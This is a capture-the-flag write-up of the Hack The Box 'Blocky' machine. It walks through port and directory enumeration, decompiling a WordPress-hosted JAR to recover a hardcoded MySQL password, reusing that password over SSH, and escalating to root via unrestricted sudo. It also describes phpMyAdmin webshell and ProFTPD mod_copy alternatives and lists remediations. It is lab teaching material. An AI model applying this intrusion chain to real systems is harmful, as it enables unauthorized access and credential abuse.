blocky

OS: Linux (Ubuntu 16.04)
Domain / vhosts: none

Summary

Blocky is a Minecraft-themed Linux Easy built around a single recurring real-world pattern: hardcoded credentials in a compiled artifact, reused as the system account password. The box hosts a WordPress site alongside a live Minecraft server; the WordPress /plugins path has directory listing enabled and exposes a custom BlockyCore.jar plugin whose Java class contains a MySQL password in plaintext. The same password is reused for the SSH account notch (the Minecraft creator’s username — the intended giveaway). notch has unrestricted sudo, so a single sudo su - with the known password completes the chain.

The teaching beats are layered: (1) gobuster with a medium wordlist uncovers directory listings — a small wordlist misses /plugins; (2) JAR files are ZIP archives whose class files can be decompiled without a GUI to recover hardcoded strings; (3) the critical gotcha is that the JAR reveals the password but not the username — the username comes from WordPress author attribution, not the plugin code; (4) password reuse from a service credential to a system account is the actual root cause.

Source attribution

0xdf, “HTB: Blocky” — https://0xdf.gitlab.io/2020/06/30/htb-blocky.html. Primary source. Covers the gobuster path, WPScan user enumeration, JAR decompilation (jd-gui and javap), SSH credential reuse, and the phpMyAdmin and FTP alternative paths.
IppSec, “Blocky” video walkthrough — https://ippsec.rocks/?#Blocky.

Recon

nmap -p- --min-rate=5000 -oN nmap/allports.txt <TARGET>
nmap -sC -sV -p 21,22,80,25565 -oN nmap/scripts.txt <TARGET>

21/tcp    open  ftp      ProFTPD 1.3.5a
22/tcp    open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.2
80/tcp    open  http     Apache httpd 2.4.18 (WordPress 4.8)
25565/tcp open  minecraft Minecraft 1.11.2 (0/20 users)

The Minecraft server on 25565 confirms the box theme and pins the Java plugin ecosystem. ProFTPD 1.3.5a has a known mod_copy RCE (CVE-2015-3306) but it is not the intended path. WordPress 4.8 on Ubuntu 16.04 is the attack surface.

Web enumeration

The WordPress homepage shows a single post by user notch — visible in the post author byline without any scanning. WPScan confirms it:

wpscan --url http://<TARGET>/ -e ap,t,tt,u

[+] Enumerating Users
 | Found By: Author Posts - Author Pattern
 | Confirmed By: Login Error Messages
 |
 | notch, Author: notch

notch is the SSH username. This is not in the JAR; it must be found here first.

Gobuster with a medium wordlist finds the critical directory:

gobuster dir -u http://<TARGET>/ \
    -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
    -x php -t 40

/wiki         (Status: 301)
/wp-content   (Status: 301)
/plugins      (Status: 301)  ← directory listing enabled
/phpmyadmin   (Status: 301)
/wp-login.php (Status: 200)

/plugins serves a dynamic “Cute File Browser” (JavaScript-based, not Apache directory listing). Files are listed via an AJAX call to /plugins/scan.php and served from /plugins/files/:

curl http://blocky.htb/plugins/scan.php
# → {"name":"files","type":"folder","path":"files","items":[
#     {"name":"BlockyCore.jar","path":"files/BlockyCore.jar","size":883},
#     {"name":"griefprevention-1.11.2-3.1.1.298.jar",...}]}

The actual download URLs are:

http://blocky.htb/plugins/files/BlockyCore.jar
http://blocky.htb/plugins/files/griefprevention-1.11.2-3.1.1.298.jar

griefprevention is a legitimate public Minecraft Forge plugin. BlockyCore.jar is a custom plugin written for this server — the one to examine.

Credential recovery — BlockyCore.jar decompilation

JAR files are ZIP archives. The class files inside are Java bytecode that can be decompiled back to near-source-level Java.

# Files are under /plugins/files/ (served by Cute File Browser via scan.php)
wget http://blocky.htb/plugins/files/BlockyCore.jar

With jd-gui (GUI decompiler):

jd-gui BlockyCore.jar

Navigate to com/myfirstplugin/BlockyCore.class. The constructor shows:

public String sqlHost = "localhost";
public String sqlUser = "root";
public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";

Without a GUI (command-line only):

unzip BlockyCore.jar -d BlockyCore/
javap -c BlockyCore/com/myfirstplugin/BlockyCore.class

The bytecode ldc instructions show the three hardcoded string constants: localhost, root, and the password 8YsqfCTnvxAUeduzjNSXe22.

Foothold — password reuse

The credential in the JAR is the MySQL database password (sqlUser = root). The username for SSH is notch (from WordPress). The developer reused the same password for the system account:

ssh notch@<TARGET>
# Password: 8YsqfCTnvxAUeduzjNSXe22

notch@Blocky:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),...,27(sudo),...

user.txt is at /home/notch/user.txt.

Privilege escalation — unrestricted sudo

notch@Blocky:~$ sudo -l
[sudo] password for notch: 8YsqfCTnvxAUeduzjNSXe22

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

notch has completely unrestricted sudo with password. Since the password is known:

sudo su -

root@Blocky:~# id
uid=0(root) gid=0(root) groups=0(root)

root.txt is at /root/root.txt.

Alternative paths

phpMyAdmin (/phpmyadmin): the MySQL root credential from the JAR works at /phpmyadmin. From there, an attacker can manipulate the WordPress database to create an admin user, install a PHP webshell as a plugin (executing as www-data), or read/write user table entries to obtain notch’s WordPress password hash.

ProFTPD 1.3.5a (CVE-2015-3306 / mod_copy): the SITE CPFR/SITE CPTO commands in the mod_copy module allow unauthenticated file copying. An attacker can copy a PHP webshell from a world-readable location into the web root without credentials. However, notch’s password also works directly for FTP login, making the unauth RCE unnecessary here.

Why each step worked

Directory listing on /plugins: Apache’s Options +Indexes was not explicitly disabled for the plugins directory. When enabled, Apache serves a browseable file listing for any directory without an index file, exposing every file in that path to unauthenticated users.
Hardcoded credentials in Java bytecode: Java class files retain all string literals from the source. A constant like sqlPass = "8YsqfCTnvxAUeduzjNSXe22" is stored verbatim in the constant pool of the .class file. Decompilers reconstruct the source from this pool with near-perfect fidelity. Credentials must never appear as string literals in source code — they belong in environment variables, vaults, or configuration files outside the distributed artifact.
Username not in the JAR: the developer’s MySQL user is root, but the system account is notch. An attacker who tries root / the password over SSH fails and may stop there. The WordPress author attribution is the signal for the correct username.
Password reuse across MySQL and SSH: the developer used the same string as both the MySQL root password (internal service) and the SSH account password (interactive login). Any single-point credential exposure therefore compromises both surfaces.
(ALL : ALL) ALL sudo entry: unrestricted sudo is equivalent to root access for any user who knows the password. Combined with the known password, this is a one-command escalation.

Counterfactuals

Disable directory listing: Options -Indexes in the Apache configuration, globally or per-directory. No web directory should be browseable unless explicitly intended.
Never embed credentials in source code. Use environment variables, a secrets manager, or an external configuration file that is not checked into version control and not deployed to web-accessible paths.
Do not reuse service credentials as interactive account passwords. The MySQL root password and the SSH account password should be independent secrets.
Restrict sudo to specific commands: notch ALL=(root) /usr/bin/minecraft-start or equivalent, rather than ALL. If notch legitimately needs broad admin access, require a password (which is already enforced here, but a known password is equivalent to no password in practice after the credential is leaked).
Remove ProFTPD’s mod_copy module if unused, or disable the SITE CPFR/SITE CPTO commands explicitly.

Key Takeaways

Always run gobuster with a medium wordlist. The standard SecLists common.txt misses /plugins; directory-list-2.3-medium.txt finds it. The difference is 220 000 entries vs 4 600 entries.
JAR files are just ZIP archives. unzip <file>.jar -d out/ then javap -c out/com/example/Classfile.class extracts string constants without needing a GUI decompiler. strings on the JAR also works for quick regex sweeps of the constant pool.
WordPress post-author attribution (the byline on any post) gives you a valid username without any scan. Always read the page before running a tool.
A credential in an application config or plugin file should always be tested against SSH and other interactive services on the same host. Password reuse from a service context to a system account is one of the most common foothold-to-user pivots on HTB.
(ALL : ALL) ALL in sudoers with a known password means instant root. Run sudo -l immediately after foothold — it’s faster than any enumeration tool.

References

0xdf, “HTB: Blocky” — https://0xdf.gitlab.io/2020/06/30/htb-blocky.html
IppSec, “Blocky” — https://ippsec.rocks/?#Blocky
CVE-2015-3306 (ProFTPD mod_copy)